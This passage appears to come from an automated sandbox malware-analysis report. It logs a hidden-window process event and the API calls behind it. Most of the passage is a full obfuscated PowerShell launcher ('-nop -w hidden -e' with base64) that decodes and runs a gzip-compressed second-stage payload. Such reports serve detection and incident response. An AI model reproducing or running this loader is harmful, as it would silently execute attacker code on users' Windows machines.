QBQAFIAYwB2AGkANgBBAEcAYQBCADkAUQBPADYAVQBrAHAARABOAGQANwArAFoAbAAwAFQANABPADgAbQB5AHEAMwBVAGgALwBQAE4AKwBUAFoAYgBuAHQAVgAvAHMAdgBvAGwAQQBlAGwAWABDADgAdABQAGkAagB3AHQANwBmAGUASwAzAFgAWAA2AEsAcQBRAEEANQBCADgAbwAxAEkAOQB1AEgAeABFAHMAewAxAH0ANwBIAEoAagBMADYAbwA1ADcALwAzAGQAawBJAC8AcgB5ADAAdwBjAEQATwBDAHgAbAByAGUATABmAHcAQQBnADIANQBRADQAMAB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBZACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
cmdline	powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARQBnAEgANgAyAFUAQwBBADcAVgBXAGIAVwAvAGkATwBCAEQAKwB2AHQATAArAGgAMgBpAEYAUgBOAEIAUwBFAGwANgB1ADIAMQBaAGEANgBSAHoAUwBBAEcAMgBoAGcAUgBRAG8AWgBkAEgASgBUAFoAegBFAGkAeABQAFQAeABDAG0AbABlAC8AdgBmAGIAeAB4AEkAeQA5ACcAJwArACcAJwA2ADIAcQA5ADUASgBhADQAbgBXAHMAVwBmAEcANAAyAGUAZQBtAGIARwBmAHgAYQA2AGcAUABGAGIAaQBsAHYATAB0AC8AVAB0AGwATgAyAHkAYwA0AEUAaABSAFMAegB3ADEAeABsAFcAbABsAEQAVQByAHoAMwB1AGwATgBEAHMAJwAnACsAJwAnADgAVQBqADQAcgA2AGgAeQB0AFYAaQBhAFAATQBJADAAWABKAHkAZgB0AEwARQBsAEkATABMAGIAZgB0AFEANABSAEsARQAxAEoAZABNAHMAbwBTAGQAVwBLADgAcgBjAHkARABVAGwAQwBEAGkANQB2AHYAeABKAFgASwBOACsAVQAwAGwAKwAxAEQAdQBPADMAbQBPADMARQBOAG0AMwBzAGgAawBRADUAUQBMAEUAbgA5AHkANgA0AGkANgBWAGIATgBXAGYARgBxAEYARABMAFgANwA2AFUASwAvAE8ARAArAHEASgAyAGUAcABkAGgAbABxAHAAbABaADUATQBLAEUAdABVADgAeABzAG8AVgA1AFgAdABGAEgAbgBpADEAVwBSAEcAMQAzAEsAZAB1AHcAbABQAHUAaQA5AHEAVQB4AHMAMQBHAGIAUgB5AG4AMgBDAGMARABzAEgAWgBQACsAawBTAEUAMwBFAHYATABjAEoAbgBuADYAeQBSAEUAWgBFAG0AOAB2AFoAVQAwAHMAeABWAFMAeQB6AEMAMQBFACsANABpAHoAMAB0AEkAbQBwAGEAcgB5AGwAdwBlAE0ARgA4AHMALwBsAFQAbgB1ADkATgBIAFcAUwB4AG8AUgBHAHEAOQBXAEoAQwBFAHIAeAB5AFMAMwBGAE8AWABwAEwAVQB1AGoAagAxAEcAUgBzAFIAZgBnAEoAewAxAH0AagBFACcAJwArACcAJwBoAG8ASABpADAAbwBGAHgATwA3ADUAawBxAGkAbABPAEcATwBzAHEAdgB3AFgATQArAHEAQQByAEEAdgBzADMAcQBxAGsANwBpAHUAQgBsAEMAMgBTAFMAaABWAEMAKwBzAEkAOQArADkAegBMAEcATgBsAHEAbABsADkAdwBOAEsAZABCAEIAYwBhAFcAQwBnAEQAZgBkADQAbQBnAC8AOABTAGQAdwB4AGUANAA4ADcAeABRAGoASABtACsAUQA4AEIAZgAxAGUAewAxAH0AcAB6AFYAVQAnACcAKwAnACcALwBLADMAcABWADYAYwBQAEoAVwBQAEIAawBBADUAKwBsAHEAeQBRAGoAbABjAFUAVAAyAGsAcgBwADAAUgA0AGwAMQBiAGQAYQBxAHgAZQBxAG8ARQBnAG0ANgA4AHsAMQB9ADUAcgBNADAAbgBuAEgAcQBMAFoAdwBzAC8AaABMACsAMABuAFAAbQA5AHIAcABSADYAbgBjADAAbQA4AFcAbABNAHoARQAyAE0ASQArAG8AVwBoAEYAVgBmAEMAZwByAHgARwBjAGsAeABxAFIAVgBpACcAJwArACcAJwBBAC8AQgBSAEwAZQA4ADIAaQBHAGMAUwBSAGcASQBzAEoATQB5AFMARwB6ACsAcABuAFUAWgBVAFAATwBrAGEARwBXAFUAZQBTAFoAQQBMAGcAVQAzAEIASwA0AGgANQA1AFUAZABuAHQAcABGAFQAeQA3ADIANABUAHkASQBBAGMAUABzAE4AWgBDADMANQBrAEMAYQBrAGsATgA2AGwAeABxAHsAMQB9ADQAWABYADYARABVAEwAbgBOAGMASgBwAFcARgBUAHUARABQAEgAVwByACcAJwArACcAJwBpAGsATQAnACcAKwAnACcAdwBJADEANQBWAFEAWABGAEsAZAAxAHMAJwAnACsAJwAnAG8ARQB6AHkAZgBsAHAALwBkADcAVwBkAE0AVQBCAGUAbgBvAGoAQwAzAHEAUAB3AGIAegAnACcAKwAnACcAOQAyADUAYgBSADYAbgBJAHMAbABjACcAJwArACcAJwBpAEMAMQBnAGMATwBXAHMAaQBFAHMAeABrADUAQgBVAGwAUwA3ADEAaQBMAEYAeABhAEYAQwBjAFgAMwA0AFIAawBEAFoAbQBEAFAASQBIAEwATgAxAEQAUQBHAEIARgBBAHUARQBJAHkAWgBnAEUAWABNADMAWgBVAGEAawA1AFIAUABTAGkARgBTAE0AUgB5AE8AUwBGAHcAMgBJADQAZwBEAEsAeAB5ADUASwBjAHsAMQB9AGoAZwBnAFgAdgBrADEAVAA0AHQAcwAyAEYASgBmAHsAMQB9AGwATwBBAHMAdQBjAG4AQgBOAHgAaABYAEYAUwBWAEMAVQAwAEUAMQBDAEcASgBjADAANgB5AC8AKwBYAEgAegB5AFYAbwA2ADEAQQA3AEkAYgBzAFEAcQBVAFcAbQB6AHsAMQB9ADIATgBrAE0AbABRAGUAaAB5AFoAQQA4AG4AVgBIAFUANAA1AEsAbwBrAEEAUgBLAHkARQBSAHcAWgBPAHkAVwBGAHIAVwAyAC8AVQBEADkAbwBsAHQAUgBHAE0AVwBTADkAbQBmAGUAOQBzAFMAZQB1ADkATgBmAHoANgA4AEIAdgBUAFoAbwAvADMALwBTAE4AYgA2AEQAegBxAHUAKwAzAFUANwBsAGgASABpAEsANgBEAHQAWABzADAAUQBLADUAMwA1AHAARgBqAFoAOQBJAFMAegBtAGwAUAB0AEcAMwBVAEgAVgBMAGQAYQBJAFcAdQBvAFYAJwAnACsAJwAnAC8ASgBlAFQAMABJAGsASABkADUANABSAGoAaABNACcAJwArACcAJwBIAFMAWgBiAHAAdABkAHoAWgBtAGwATwBsADEAMwBwADkATABXADEAbwBiAGIAYQBuAFcAdgBkAGQAUgBzAHQAaQA2AGIAKwBoAEkAUQBuACcAJwArACcAJwBJAEgAZQBFAG4AbQBEAGkASwA0AGYATABtAEQAdQBTAGgAdABHAEwAegBYADAASABqAHMAOQAnACcAKwAnACcAYQA0ADkAdQBwAHcAMwByAFoAcwBxADYAVwBzAHMASwAvAFMAbABQAG4AYwBPAFoAcQBXAG4AYQBzAHsAMQB9AGYATgAvAGcAewAxAH0AaABnADMAdgBOAC8AdQBhADYAUAB1AEoAWABYAFQAYwB5AFcAagBIAFgAagAnACcAKwAnACcAdAB1AHQASgBUAHAARgBxAEIAMgBmAFQAaQB5AEQAbgA4ACsATQBCAE4AbgBhAEIAQQBjAHIAagBvAGEAZgBtAGoAdwBLADIAdQBqAHMAdwBhAEQAawBaAGoAaQAyAGoATwBIAFEATQB0AEMANAA4AC8AWABPAFAATgB7ADEAfQBDADcAWABoADYAagBVAE4AagBPAG0AbgBRAG0AOQBYADEASwBJAFIAdgBhADkAMABkAG4AbQB0ADYAcQArAGUAUgBSADAANABsAGMAQgAyAE8AYwBHAGoAeQBVAHoAbQAzAFAATQA5ADgANABKAFoANQBhADYANgBFAE4AYQAxAFAAQgBwADIAUAA2AGMAUABaACcAJwArACcAJwBOAGUANQBmAEoASgBlAFcAcAB0AFcAbgBJAEIAdQBNAHcARgA3AFEAYgByAGkAaABEAC8AYgBNAGoAOABqADQATwBPAEIAcABBAHkAOABOAGoAZwB4AHAANAArAHsAMQB9AE8AZABjAEwAWgB5AHIASQBaADcARgArAE4ARwB4AHgATgAyAE8AQQBhAG8ANAB1AGIAagBiAFEAeABzADEAdQBvAHEALwBOAHAASgAwAEIARAAnACcAKwAnACcARQBNAGUAQgBNAGMAUQBvAHYAVABjAGYAVABhADAAKwA4AGIAZwAzAC8AVwBNAHcAOAA3AFgASgBOAGYAdQBrAG0AZQAyAGgASAB7ADEAfQA0ADEATwBWAGIAawBIAHYANgB1AHUAKwBhADUAZQAxAE4AZgB1ADUAZQBmAGoAaQA2AG0AZABCAEoAeABCACcAJwArACcAJwBOAHUAVABEADAAQwBnACsAWgBqAEcAbwB0AGwAewAnACcAKwAnACcAMQB9AGwAQgA1ADgAVwBXADMAZgB2AHkAdAA1AGsAegAwAEsAdgBkAFoASAArAGoAaABKAFEAOAB5AEEAVwB0AEEAZwBpAGsAUwAzAGUARwBMAHQAaQByADcATgBxAGQAUgBRAFYAWABnADQATABFAGsAUwBFAHcAYgBOAEYAdABwAHgAawBSAHUASQBNAGUANwBLAGgAZwBQAE4AQQBWAHIAZAB0AGcASABKAGYAagBqAHUANQBlADYAOABOAEsAcwBvAFQAJwAnACsAJwAnADQASwBWADUAegBaAFUATABKADIAYwAzAEkAQwBIAE0AdABVAGcAQwBXAG8AWABKAEEANQBFAFcATgBVAGYAbQByAG8ATwBMAFUAUgAvADAARgB0ADUAVAByADMAOQBYAG0AMgArADIAcQBpADUAcwBhAHAAcwBRAGcAQgBMAHsAMQB9AFoAdgBsAHQAcwBFAGMAOQBSAFYAVgAvAGQAMQBJAHcAUwB0AEQAUQBMAEYANwBEAGEAdgBYAHsAMQB9AEkATgB6AGwAMQBDAHsAMQB9AG8ARgBSAHUAUwA0AFUARQB6ACsAQwBjADcAVQBPAFgAMwArAG0ASgBBAFAAdQA0AEEAVwBCADEAdQBQAFIAYwB2AGkANgBBAEcAYQBCADkAUQBPADYAVQBrAHAARABOAGQANwArAFoAbAAwAFQANABPADgAbQB5AHEAMwBVAGgALwBQAE4AKwBUAFoAYgBuAHQAVgAvAHMAdgBvAGwAQQBlAGwAWABDADgAdABQAGkAagB3AHQANwBmAGUASwAzAFgAWAA2AEsAcQBRAEEANQBCADgAbwAxAEkAOQB1AEgAeABFAHMAewAxAH0ANwBIAEoAagBMADYAbwA1ADcALwAzAGQAawBJAC8AcgB5ADAAdwBjAEQATwBDAHgAbAByAGUATABmAHcAQQBnADIANQBRADQAMAB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBZACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 31, 2024, 10:03 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARQBnAEgANgAyAFUAQwBBADcAVgBXAGIAVwAvAGkATwBCAEQAKwB2AHQATAArAGgAMgBpAEYAUgBOAEIAUwBFAGwANgB1ADIAMQBaAGEANgBSAHoAUwBBAEcAMgBoAGcAUgBRAG8AWgBkAEgASgBUAFoAegBFAGkAeABQAFQAeABDAG0AbABlAC8AdgBmAGIAeAB4AEkAeQA5ACcAJwArACcAJwA2ADIAcQA5ADUASgBhADQAbgBXAHMAVwBmAEcANAAyAGUAZQBtAGIARwBmAHgAYQA2AGcAUABGAGIAaQBsAHYATAB0AC8AVAB0AGwATgAyAHkAYwA0AEUAaABSAFMAegB3ADEAeABsAFcAbABsAEQAVQByAHoAMwB1AGwATgBEAHMAJwAnACsAJwAnADgAVQBqADQAcgA2AGgAeQB0AFYAaQBhAFAATQBJADAAWABKAHkAZgB0AEwARQBsAEkATABMAGIAZgB0AFEANABSAEsARQAxAEoAZABNAHMAbwBTAGQAVwBLADgAcgBjAHkARABVAGwAQwBEAGkANQB2AHYAeABKAFgASwBOACsAVQAwAGwAKwAxAEQAdQBPADMAbQBPADMARQBOAG0AMwBzAGgAawBRADUAUQBMAEUAbgA5AHkANgA0AGkANgBWAGIATgBXAGYARgBxAEYARABMAFgANwA2AFUASwAvAE8ARAArAHEASgAyAGUAcABkAGgAbABxAHAAbABaADUATQBLAEUAdABVADgAeABzAG8AVgA1AFgAdABGAEgAbgBpADEAVwBSAEcAMQAzAEsAZAB1AHcAbABQAHUAaQA5AHEAVQB4AHMAMQBHAGIAUgB5AG4AMgBDAGMARABzAEgAWgBQACsAawBTAEUAMwBFAHYATABjAEoAbgBuADYAeQBSAEUAWgBFAG0AOAB2AFoAVQAwAHMAeABWAFMAeQB6AEMAMQBFACsANABpAHoAMAB0AEkAbQBwAGEAcgB5AGwAdwBlAE0ARgA4AHMALwBsAFQAbgB1ADkATgBIAFcAUwB4AG8AUgBHAHEAOQBXAEoAQwBFAHIAeAB5AFMAMwBGAE8AWABwAEwAVQB1AGoAagAxAEcAUgBzAFIAZgBnAEoAewAxAH0AagBFACcAJwArACcAJwBoAG8ASABpADAAbwBGAHgATwA3ADUAawBxAGkAbABPAEcATwBzAHEAdgB3AFgATQArAHEAQQByAEEAdgBzADMAcQBxAGsANwBpAHUAQgBsAEMAMgBTAFMAaABWAEMAKwBzAEkAOQArADkAegBMAEcATgBsAHEAbABsADkAdwBOAEsAZABCAEIAYwBhAFcAQwBnAEQAZgBkADQAbQBnAC8AOABTAGQAdwB4AGUANAA4ADcAeABRAGoASABtACsAUQA4AEIAZgAxAGUAewAxAH0AcAB6AFYAVQAnACcAKwAnACcALwBLADMAcABWADYAYwBQAEoAVwBQAEIAawBBADUAKwBsAHEAeQBRAGoAbABjAFUAVAAyAGsAcgBwADAAUgA0AGwAMQBiAGQAYQBxAHgAZQBxAG8ARQBnAG0ANgA4AHsAMQB9ADUAcgBNADAAbgBuAEgAcQBMAFoAdwBzAC8AaABMACsAMABuAFAAbQA5AHIAcABSADYAbgBjADAAbQA4AFcAbABNAHoARQAyAE0ASQArAG8AVwBoAEYAVgBmAEMAZwByAHgARwBjAGsAeABxAFIAVgBpACcAJwArACcAJwBBAC8AQgBSAEwAZQA4ADIAaQBHAGMAUwBSAGcASQBzAEoATQB5AFMARwB6ACsAcABuAFUAWgBVAFAATwBrAGEARwBXAFUAZQBTAFoAQQBMAGcAVQAzAEIASwA0AGgANQA1AFUAZABuAHQAcABGAFQAeQA3ADIANABUAHkASQBBAGMAUABzAE4AWgBDADMANQBrAEMAYQBrAGsATgA2AGwAeABxAHsAMQB9ADQAWABYADYARABVAEwAbgBOAGMASgBwAFcARgBUAHUARABQAEgAVwByACcAJwArACcAJwBpAGsATQAnACcAKwAnACcAdwBJADEANQBWAFEAWABGAEsAZAAxAHMAJwAnACsAJwAnAG8ARQB6AHkAZgBsAHAALwBkADcAVwBkAE0AVQBCAGUAbgBvAGoAQwAzAHEAUAB3AGIAegAnACcAKwAnACcAOQAyADUAYgBSADYAbgBJAHMAbABjACcAJwArACcAJwBpAEMAMQBnAGMATwBXAHMAaQBFAHMAeABrADUAQgBVAGwAUwA3ADEAaQBMAEYAeABhAEYAQwBjAFgAMwA0AFIAawBEAFoAbQBEAFAASQBIAEwATgAxAEQAUQBHAEIARgBBAHUARQBJAHkAWgBnAEUAWABNADMAWgBVAGEAawA1AFIAUABTAGkARgBTAE0AUgB5AE8AUwBGAHcAMgBJADQAZwBEAEsAeAB5ADUASwBjAHsAMQB9AGoAZwBnAFgAdgBrADEAVAA0AHQAcwAyAEYASgBmAHsAMQB9AGwATwBBAHMAdQBjAG4AQgBOAHgAaABYAEYAUwBWAEMAVQAwAEUAMQBDAEcASgBjADAANgB5AC8AKwBYAEgAegB5AFYAbwA2ADEAQQA3AEkAYgBzAFEAcQBVAFcAbQB6AHsAMQB9ADIATgBrAE0AbABRAGUAaAB5AFoAQQA4AG4AVgBIAFUANAA1AEsAbwBrAEEAUgBLAHkARQBSAHcAWgBPAHkAVwBGAHIAVwAyAC8AVQBEADkAbwBsAHQAUgBHAE0AVwBTADkAbQBmAGUAOQBzAFMAZQB1ADkATgBmAHoANgA4AEIAdgBUAFoAbwAvADMALwBTAE4AYgA2AEQAegBxAHUAKwAzAFUANwBsAGgASABpAEsANgBEAHQAWABzADAAUQBLADUAMwA1AHAARgBqAFoAOQBJAFMAegBtAGwAUAB0AEcAMwBVAEgAVgBMAGQAYQBJAFcAdQBvAFYAJwAnACsAJwAnAC8ASgBlAFQAMABJAGsASABkADUANABSAGoAaABNACcAJwArACcAJwBIAFMAWgBiAHAAdABkAHoAWgBtAGwATwBsADEAMwBwADkATABXADEAbwBiAGIAYQBuAFcAdgBkAGQAUgBzAHQAaQA2AGIAKwBoAEkAUQBuACcAJwArACcAJwBJAEgAZQBFAG4AbQBEAGkASwA0AGYATABtAEQAdQBTAGgAdABHAEwAegBYADAASABqAHMAOQAnACcAKwAnACcAYQA0ADkAdQBwAHcAMwByAFoAcwBxADYAVwBzAHMASwAvAFMAbABQAG4AYwBPAFoAcQBXAG4AYQBzAHsAMQB9AGYATgAvAGcAewAxAH0AaABnADMAdgBOAC8AdQBhADYAUAB1AEoAWABYAFQAYwB5AFcAagBIAFgAagAnACcAKwAnACcAdAB1AHQASgBUAHAARgBxAEIAMgBmAFQAaQB5AEQAbgA4ACsATQBCAE4AbgBhAEIAQQBjAHIAagBvAGEAZgBtAGoAdwBLADIAdQBqAHMAdwBhAEQAawBaAGoAaQAyAGoATwBIAFEATQB0AEMANAA4AC8AWABPAFAATgB7ADEAfQBDADcAWABoADYAagBVAE4AagBPAG0AbgBRAG0AOQBYADEASwBJAFIAdgBhADkAMABkAG4AbQB0ADYAcQArAGUAUgBSADAANABsAGMAQgAyAE8AYwBHAGoAeQBVAHoAbQAzAFAATQA5ADgANABKAFoANQBhADYANgBFAE4AYQAxAFAAQgBwADIAUAA2AGMAUABaACcAJwArACcAJwBOAGUANQBmAEoASgBlAFcAcAB0AFcAbgBJAEIAdQBNAHcARgA3AFEAYgByAGkAaABEAC8AYgBNAGoAOABqADQATwBPAEIAcABBAHkAOABOAGoAZwB4AHAANAArAHsAMQB9AE8AZABjAEwAWgB5AHIASQBaADcARgArAE4ARwB4AHgATgAyAE8AQQBhAG8ANAB1AGIAagBiAFEAeABzADEAdQBvAHEALwBOAHAASgAwAEIARAAnACcAKwAnACcARQBNAGUAQgBNAGMAUQBvAHYAVABjAGYAVABhADAAKwA4AGIAZwAzAC8AVwBNAHcAOAA3AFgASgBOAGYAdQBrAG0AZQAyAGgASAB7ADEAfQA0ADEATwBWAGIAawBIAHYANgB1AHUAKwBhADUAZQAxAE4AZgB1ADUAZQBmAGoAaQA2AG0AZABCAEoAeABCACcAJwArACcAJwBOAHUAVABEADAAQwBnACsAWgBqAEcAbwB0AGwAewAnACcAKwAnACcAMQB9AGwAQgA1ADgAVwBXADMAZgB2AHkAdAA1AGsAegAwAEsAdgBkAFoASAArAGoAaABKAFEAOAB5AEEAVwB0AEEAZwBpAGsAUwAzAGUARwBMAHQAaQByADcATgBxAGQAUgBRAFYAWABnADQATABFAGsAUwBFAHcAYgBOAEYAdABwAHgAawBSAHUASQBNAGUANwBLAGgAZwBQAE4AQQBWAHIAZAB0AGcASABKAGYAagBqAHUANQBlADYAOABOAEsAcwBvAFQAJwAnACsAJwAnADQASwBWADUAegBaAFUATABKADIAYwAzAEkAQwBIAE0AdABVAGcAQwBXAG8AWABKAEEANQBFAFcATgBVAGYAbQByAG8ATwBMAFUAUgAvADAARgB0ADUAVAByADMAOQBYAG0AMgArADIAcQBpADUAcwBhAHAAcwBRAGcAQgBMAHsAMQB9AFoAdgBsAHQAcwBFAGMAOQBSAFYAVgAvAGQAMQBJAHcAUwB0AEQAUQBMAEYANwBEAGEAdgBYAHsAMQB9AEkATgB6AGwAMQBDAHsAMQB9AG8ARgBSAHUAUwA0AFUARQB6ACsAQwBjADcAVQBPAFgAMwArAG0ASgBBAFAAdQA0AEEAVwBCADEAdQBQAFIAYwB2AGkANgBBAEcAYQBCADkAUQBPADYAVQBrAHAARABOAGQANwArAFoAbAAwAFQANABPADgAbQB5AHEAMwBVAGgALwBQAE4AKwBUAFoAYgBuAHQAVgAvAHMAdgBvAGwAQQBlAGwAWABDADgAdABQAGkAagB3AHQANwBmAGUASwAzAFgAWAA2AEsAcQBRAEEANQBCADgAbwAxAEkAOQB1AEgAeABFAHMAewAxAH0ANwBIAEoAagBMADYAbwA1ADcALwAzAGQAawBJAC8AcgB5ADAAdwBjAEQATwBDAHgAbAByAGUATABmAHcAQQBnADIANQBRADQAMAB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBZACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA filepath: powershell.exe	1	1	0
CreateProcessInternalW May 31, 2024, 10:03 a.m.	thread_identifier: 2224 thread_handle: 0x00000454 process_identifier: 2220 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oE